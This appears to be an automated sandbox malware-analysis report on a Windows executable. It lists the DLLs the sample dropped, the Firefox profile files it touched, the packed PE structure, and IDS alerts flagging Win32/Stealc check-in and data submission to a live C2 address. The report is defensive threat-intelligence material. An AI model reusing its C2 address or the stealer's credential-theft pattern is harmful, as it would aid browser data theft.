Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945398450393236
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'837'568 bytes
MD5:	0e61d1e023f371c6ba74939512e40085
SHA1:	e7ed889e50004229e721ef910059b8ef7fbdffd6
SHA256:	71dc3327500da80337a73deb8b4161ae844864aeb0985c4c8e058fb2ebac9b93
SHA512:	255d08e303ab1999e0d13650532508c8dea6ec6608a35b63a62b384cf15f3a21e68a5b360b682a584bdab0f500376c9b370d81b0799423428a2a391a5c6ec7f7
SSDEEP:	49152:QDsSKc4IEqUSP/2Y5pgF5/fnLLxQ/DPaPDgVwVpTVm:QAbYVUNIpw/fnxQ7yPDJ
TLSH:	9B8533C82C77CA30DA99CCF58AFA44B5034AE64DF72CB4932E419729961D9C08B7E374
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa93000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2810967A3Ah
psubsb mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	2d9888b704a1b1e3b96ecf5c5561b0fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x299000	0x200	517d52a98025a9b120c3a680166c9641	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wrqldbzh	0x4f7000	0x19b000	0x19a800	0f52fe403281744b4cd0cf49541feb31	False	0.9947204961556029	data	7.952482837111148	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ucfplqsw	0x692000	0x1000	0x400	5a75f04eb417f347f1372257417b1165	False	0.763671875	data	6.099771047121344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x693000	0x3000	0x2200	91be2751c1f3a3970233ccb68623350b	False	0.006433823529411764	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T00:38:59.975127+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:00.200964+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:00.578726+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T00:39:00.796565+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:00.804015+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T00:39:01.903727+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:03.404191+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:08.048170+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:09.274786+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:10.612779+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:11.496260+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:15.284439+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T00:39:16.187375+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 00:38:58.400926113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:58.405889988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:58.405987978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:58.406256914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:58.411024094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.733294964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.733349085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.733372927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.733489990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.733544111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.733557940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.736876011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.745522976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.974968910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:38:59.975126982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.976375103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:38:59.982671976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.200824976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.200850010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.200963974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.334503889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.334642887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.573858976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.578726053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796380997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796416998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796426058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796564102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796565056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.796575069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796603918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.796669960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.796983004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.796993017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.797003031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.797013044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:00.797038078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.797076941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.799197912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:00.804014921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:01.023580074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:01.023906946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:01.049926043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:01.049993992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:01.054788113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:01.054821968 CEST	80	49730	185.215.113.37	192.168.2.4
